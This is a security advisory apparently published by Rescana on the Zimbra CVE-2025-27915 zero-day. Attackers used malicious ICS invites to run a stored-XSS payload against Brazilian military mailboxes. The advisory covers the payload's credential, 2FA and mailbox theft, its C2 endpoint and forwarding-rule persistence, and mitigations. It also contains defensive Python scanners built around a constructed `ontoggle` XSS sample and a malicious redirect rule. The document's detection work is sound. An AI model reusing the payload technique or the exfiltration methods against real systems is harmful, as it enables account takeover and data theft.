

Zimbra CVE-2025-27915 Zero-Day Exploited via Malicious ICS Files to Breach Brazilian Military Systems

  • Rescana
  • Oct 7


Executive Summary

A highly targeted cyber-espionage campaign has been uncovered that exploited a zero-day vulnerability in Zimbra Collaboration Suite (ZCS), tracked as CVE-2025-27915, to compromise Brazilian military entities. The attackers used malicious ICS (iCalendar) files to deliver a stored cross-site scripting (XSS) payload that ran in the victim's browser when the invite was opened in the Zimbra Classic Web Client, enabling credential theft, email and contact exfiltration, and persistent unauthorized access. The campaign shows considerable technical sophistication, with strong indications of state-sponsored involvement, and underlines the need for rapid patching, vigilant monitoring, and user awareness. This advisory provides a technical breakdown, threat actor analysis, exploitation details, and actionable mitigation guidance for organizations using Zimbra or similar webmail platforms.

Threat Actor Profile

The tactics, techniques, and procedures (TTPs) observed in this campaign align with those of Russian- and Belarusian-linked advanced persistent threat (APT) groups, in particular UNC1151 (generally attributed to Belarus) and the cluster Proofpoint tracks as UNK_HeatSink. These actors are known for targeting government and military organizations in Europe and Latin America, often through spear-phishing and webmail exploitation. The Spanish-named filter rule planted for persistence ("Correo", Spanish for "mail") and the sophistication of the payload point to a well-resourced, state-sponsored adversary. The operational security observed, including obfuscated JavaScript, delayed execution, and selective targeting, is consistent with a professional APT group with a history of targeting sensitive government communications; the attribution nonetheless remains an assessment based on TTP overlap rather than a confirmed finding.

Technical Analysis of Malware/TTPs

The attack chain began with spear-phishing emails sent to Brazilian military personnel, spoofing the Libyan Navy's Office of Protocol and originating from the IP address 193.29.58.37. Each email carried a malicious ICS attachment larger than 10 KB, with obfuscated, base64-encoded JavaScript embedded in the event's DESCRIPTION field. The underlying flaw is insufficient sanitization of HTML in the Zimbra Classic Web Client's handling of calendar content: the payload used a <details> element carrying the open attribute and an ontoggle handler, so the browser fires the toggle event as soon as the element is rendered and no click by the user is required. When a victim previewed or imported the ICS file in the Classic Web Client, the JavaScript executed in the victim's authenticated browser session.
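As an added example (not code from the original post, from StrikeReady, or from Zimbra), the following Python scanner unfolds an iCalendar file as RFC 5545 requires, unescapes the text properties a client would render, and flags the traits described above: a file over 10 KB, an HTML tag carrying an on* event-handler attribute such as `<details open ontoggle=...>`, and long base64 runs that decode to text. The sample ICS inside it is constructed, its decoded payload is a harmless marker string, and the size threshold, property list, and regexes are assumptions for the check, not Zimbra's own parser logic.

```python
import base64
import re
from dataclasses import dataclass

SIZE_THRESHOLD = 10 * 1024  # reported trait: the malicious attachments exceeded 10 KB
# text properties a calendar client renders; the real payload sat in DESCRIPTION
RENDERED_PROPS = {"DESCRIPTION", "SUMMARY", "LOCATION", "COMMENT", "X-ALT-DESC"}
EVENT_HANDLER = re.compile(r"<\s*[a-z][^>]*\son[a-z]+\s*=", re.IGNORECASE)  # e.g. <details open ontoggle=
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

@dataclass
class Finding:
    prop: str    # iCalendar property the hit is in ("*" for whole-file checks)
    kind: str    # oversize | event-handler | base64-blob
    detail: str  # matched text, or a decoded preview for base64

def fold(line: str, limit: int = 75) -> str:
    """Fold a content line as RFC 5545 section 3.1 does: CRLF followed by one space."""
    parts, rest = [line[:limit]], line[limit:]
    while rest:
        parts.append(" " + rest[: limit - 1])
        rest = rest[limit - 1 :]
    return "\r\n".join(parts)

def unfold(ics_text: str) -> list[str]:
    """Reverse folding: a line starting with SPACE or HTAB continues the previous one."""
    lines: list[str] = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def unescape(value: str) -> str:
    """Undo TEXT escaping (\\n \\, \\; \\\\) so embedded HTML reads as the client sees it."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            nxt = value[i + 1]
            out.append("\n" if nxt in "nN" else nxt if nxt in ",;\\" else "\\" + nxt)
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)

def properties(ics_text: str):
    """Yield (NAME, unescaped value) per content line, dropping parameters such as ;TZID=."""
    for line in unfold(ics_text):
        if ":" in line:
            name_params, value = line.split(":", 1)
            yield name_params.split(";", 1)[0].upper(), unescape(value)

def scan_ics(ics_text: str) -> list[Finding]:
    """Return findings for one ICS document; an empty list means nothing suspicious."""
    findings: list[Finding] = []
    size = len(ics_text.encode("utf-8"))
    if size > SIZE_THRESHOLD:
        findings.append(Finding("*", "oversize", f"{size} bytes"))
    for name, value in properties(ics_text):
        if name not in RENDERED_PROPS:
            continue
        if m := EVENT_HANDLER.search(value):
            findings.append(Finding(name, "event-handler", m.group(0)))
        for blob in BASE64_BLOB.findall(value):
            try:
                decoded = base64.b64decode(blob, validate=True)
            except ValueError:
                continue  # long token that is not valid base64 (hex, URL, etc.)
            if decoded.isascii():
                findings.append(Finding(name, "base64-blob", decoded[:40].decode("ascii")))
    return findings

# Constructed sample, not the real attachment: the DESCRIPTION carries a <details> element
# whose "open" attribute makes the browser fire ontoggle on render, with no click needed;
# the handler base64-decodes a string and evals it. Here the string is a harmless marker.
_MARKER = b"console.log('constructed sample marker - not the real payload')"
_B64 = base64.b64encode(_MARKER).decode("ascii")
SAMPLE_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//Constructed//Sample//EN", "BEGIN:VEVENT",
    "UID:constructed-sample-1@example.invalid", "DTSTART:20250115T090000Z",
    "SUMMARY:Protocol meeting",
    fold('DESCRIPTION:Agenda attached.<details open ontoggle="eval(atob(\'' + _B64 + '\'))"></details>'),
    "END:VEVENT", "END:VCALENDAR", "",
])

# Constructed benign invite for comparison.
BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "BEGIN:VEVENT", "UID:constructed-sample-2@example.invalid",
    "DTSTART:20250115T090000Z", "SUMMARY:Protocol meeting",
    "DESCRIPTION:Agenda attached\\, see the room list.", "END:VEVENT", "END:VCALENDAR", "",
])

if __name__ == "__main__":
    for f in scan_ics(SAMPLE_ICS):
        print(f"{f.prop}: {f.kind} -> {f.detail}")
```

Unfolding before matching matters: the 75-octet folding rule lets an attacker split `ontoggle=` across physical lines, so a grep over the raw attachment can miss what the client reassembles. Run the scanner over attachments quarantined by the MTA or exported from suspect mailboxes; a clean result says only that these particular traits are absent.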

The payload was modular, built from several immediately invoked function expressions (IIFEs) that handled credential theft, mailbox exfiltration, and persistence. It injected hidden form fields to capture the username and password at the next login, used the Zimbra SOAP API to search every folder and exfiltrate messages at four-hour intervals, and collected contacts, distribution lists, and shared folders. For persistence it created a mail filter rule that forwarded incoming messages to an attacker-controlled address, spam_to_junk@proton.me, and hijacked the webmail session. It also went after two-factor authentication (2FA) material, exfiltrating scratch codes, trusted-device tokens, and app-specific passwords. To evade notice it delayed execution by 60 seconds, ran at most once every three days, and hid the UI elements associated with its activity. Exfiltration was by POST requests to the command-and-control (C2) endpoint https://ffrk.net/apache2_config_default_51_2_1.

Exploitation in the Wild

The campaign was first detected through unusually large ICS files containing embedded JavaScript in the mailboxes of Brazilian military personnel. Exploitation was highly targeted, with no evidence of indiscriminate attacks. The vulnerability was exploited before public disclosure and before a fix was available, making it a true zero-day. CISA has since added CVE-2025-27915 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring its real-world impact. Zimbra fixed the flaw in ZCS 9.0.0 Patch 44, ZCS 10.0.13, and ZCS 10.1.5. Note that the patch only closes the XSS: it does not remove filter rules, sessions, or stolen credentials left behind by an earlier compromise, so systems that were exposed before patching still need the checks described under Mitigation. Organizations running older or unsupported versions remain at significant risk and should upgrade immediately.

Victimology and Targeting

The primary victims were Brazilian military and government entities, with evidence of a deliberate focus on high-value targets involved in sensitive communications. The spear-phishing emails were crafted to look like official correspondence from the Libyan Navy's Office of Protocol, raising the odds of successful social engineering. The Spanish-named filter rule and the targeting of Latin American government and military organizations are consistent with previous campaigns attributed to Russian and Belarusian APTs. While the campaign's full scope remains under investigation, the precision and selectivity of the targeting indicate a clear intent to compromise strategic assets and exfiltrate confidential information.

Mitigation and Countermeasures

Immediate action is required to mitigate CVE-2025-27915. Organizations running Zimbra Collaboration Suite must apply the fixed releases (ZCS 9.0.0 Patch 44, 10.0.13, or 10.1.5 and later), referencing the official advisories at https://wiki.zimbra.com/wiki/Security_Center. Security teams should search mail logs, web server and egress proxy logs, and every mailbox's filter rules for the indicators of compromise (IOCs) above: the sender IP 193.29.58.37, the C2 endpoint https://ffrk.net/apache2_config_default_51_2_1, the forwarding address spam_to_junk@proton.me, and filter rules such as "Correo" that redirect mail to external domains (a mailbox's rules can be listed with the zmmailbox getFilterRules command). User awareness training should emphasize the risk of unsolicited calendar invites and spear-phishing. In the event of suspected compromise, initiate full forensic analysis, remove unauthorized filter rules, invalidate active webmail sessions, and reset passwords; because the payload also stole 2FA scratch codes, trusted-device tokens, and app-specific passwords, regenerate scratch codes, revoke trusted devices, and rotate app-specific passwords as well. Segment the network so that mail servers cannot reach critical internal systems, reducing the risk of lateral movement. Continuous monitoring for anomalous outbound connections, especially to known C2 infrastructure such as ffrk.net, is essential for early detection of ongoing or future attacks.
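Added example covering both the persistence and C2 traits described under Technical Analysis and the IOC sweep called for here (not code from the original post or from Zimbra): it lists mailbox filter rules that redirect mail to the known forwarding address or to any domain outside an assumed trusted set, and matches mail-log and proxy-log lines against the sender IP, C2 domain, and C2 URL path. The Sieve script and log lines are constructed in the shape of a Zimbra filter-rule export, Postfix lines in zimbra.log, and a TLS-inspecting egress proxy log; the trusted-domain set is an assumption to replace with your own.

```python
import re
from dataclasses import dataclass

# Indicators named in this advisory.
INDICATORS = {
    "known sender IP": {"193.29.58.37"},
    "known C2 domain": {"ffrk.net"},
    "known C2 URL path": {"/apache2_config_default_51_2_1"},
}
IOC_FORWARD_ADDRS = {"spam_to_junk@proton.me"}
# Assumption: domains users may legitimately redirect mail to; set this per organisation.
TRUSTED_REDIRECT_DOMAINS = {"example.mil.br"}

@dataclass
class Hit:
    source: str    # mailbox, or log file and line number
    reason: str
    evidence: str

# One Zimbra-style Sieve rule: a "# <rule name>" comment followed by a flat if-block.
RULE_BLOCK = re.compile(r"#[ \t]*(?P<name>[^\r\n]*)\r?\n\s*if\b[^{]*\{(?P<body>[^}]*)\}")
REDIRECT = re.compile(r'redirect\s+(?::copy\s+)?"(?P<addr>[^"]+)"')

def scan_sieve(script: str, mailbox: str) -> list[Hit]:
    """Flag rules that redirect mail to a known IOC address or to any untrusted domain."""
    hits: list[Hit] = []
    for rule in RULE_BLOCK.finditer(script):
        name = rule.group("name").strip()
        for addr in REDIRECT.findall(rule.group("body")):
            domain = addr.rsplit("@", 1)[-1].lower()
            if addr.lower() in IOC_FORWARD_ADDRS:
                hits.append(Hit(mailbox, f"rule '{name}' redirects to known IOC address", addr))
            elif domain not in TRUSTED_REDIRECT_DOMAINS:
                hits.append(Hit(mailbox, f"rule '{name}' redirects to external domain", addr))
    return hits

def scan_log_lines(lines, source: str) -> list[Hit]:
    """Substring-match each line against every indicator; one Hit per indicator per line."""
    hits: list[Hit] = []
    for n, line in enumerate(lines, 1):
        for reason, values in INDICATORS.items():
            for value in values:
                if value in line:
                    hits.append(Hit(f"{source}:{n}", reason, value))
    return hits

# Constructed Sieve script in the shape Zimbra exports for mailbox filter rules (not a real capture).
SAMPLE_SIEVE = """require ["fileinto", "copy", "reject", "tag", "flag", "variables", "log"];

# Correo
if anyof (header :contains ["subject"] "") {
    redirect "spam_to_junk@proton.me";
    stop;
}

# Archive newsletters
if allof (header :contains ["from"] "newsletter@example.mil.br") {
    fileinto "Newsletters";
    stop;
}
"""

# Constructed Postfix lines in the shape found in zimbra.log (not a real capture).
SAMPLE_MAIL_LOG = [
    "Jan  6 09:14:02 mail postfix/smtpd[20413]: connect from unknown[193.29.58.37]",
    "Jan  6 09:14:05 mail postfix/smtpd[20413]: 7A1C3F0: client=unknown[193.29.58.37]",
    "Jan  6 09:20:11 mail postfix/smtpd[20418]: connect from mx.example.mil.br[10.0.0.5]",
]

# Constructed egress-proxy lines. The C2 POST is sent by the victim's browser, so it appears
# on the network path out, not in the Zimbra server's own access log; without TLS inspection
# only the CONNECT to the domain is visible.
SAMPLE_PROXY_LOG = [
    '10.0.0.23 - - [06/Jan/2025:10:00:00 +0000] "POST https://ffrk.net/apache2_config_default_51_2_1 HTTP/1.1" 200 512',
    '10.0.0.23 - - [06/Jan/2025:14:00:00 +0000] "CONNECT ffrk.net:443 HTTP/1.1" 200 0',
    '10.0.0.23 - - [06/Jan/2025:10:00:05 +0000] "GET https://wiki.zimbra.com/wiki/Security_Center HTTP/1.1" 200 9876',
]

def run_sweep() -> list[Hit]:
    hits = scan_sieve(SAMPLE_SIEVE, "user@example.mil.br")
    hits += scan_log_lines(SAMPLE_MAIL_LOG, "zimbra.log")
    hits += scan_log_lines(SAMPLE_PROXY_LOG, "proxy.log")
    return hits

if __name__ == "__main__":
    for h in run_sweep():
        print(f"{h.source}: {h.reason} [{h.evidence}]")
```

The external-domain check is deliberately broader than the single IOC address: a follow-on campaign will use a different mailbox, so every redirect to a domain you did not approve deserves a look. Feed it the filter export of each mailbox rather than a sample of them, since the payload created its rule only in the mailboxes it ran in.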

References

StrikeReady Labs: 0day .ICS attack in the wild – https://strikeready.com/blog/0day-ics-attack-in-the-wild/

NVD Entry for CVE-2025-27915 – https://nvd.nist.gov/vuln/detail/CVE-2025-27915

Zimbra Security Center – https://wiki.zimbra.com/wiki/Security_Center

Zimbra Patch Release Notes – https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.13#Security_Fixes

BleepingComputer: Hackers exploited Zimbra flaw as zero-day using iCalendar files – https://www.bleepingcomputer.com/news/security/hackers-exploited-zimbra-flaw-as-zero-day-using-icalendar-files/

Security Affairs: Zimbra users targeted in zero-day exploit using iCalendar attachments – https://securityaffairs.com/183014/hacking/zimbra-users-targeted-in-zero-day-exploit-using-icalendar-attachments.html

CISA KEV Catalog – https://www.cisa.gov/known-exploited-vulnerabilities-catalog

About Rescana

Rescana is a leader in third-party risk management (TPRM) and cyber risk intelligence. Our platform empowers organizations to continuously monitor, assess, and mitigate cyber threats across their digital supply chain. By leveraging advanced analytics and real-time threat intelligence, Rescana enables security teams to proactively identify vulnerabilities, prioritize remediation, and ensure compliance with industry best practices. For more information about how our TPRM solutions can help safeguard your organization, we are happy to answer questions at ops@rescana.com.
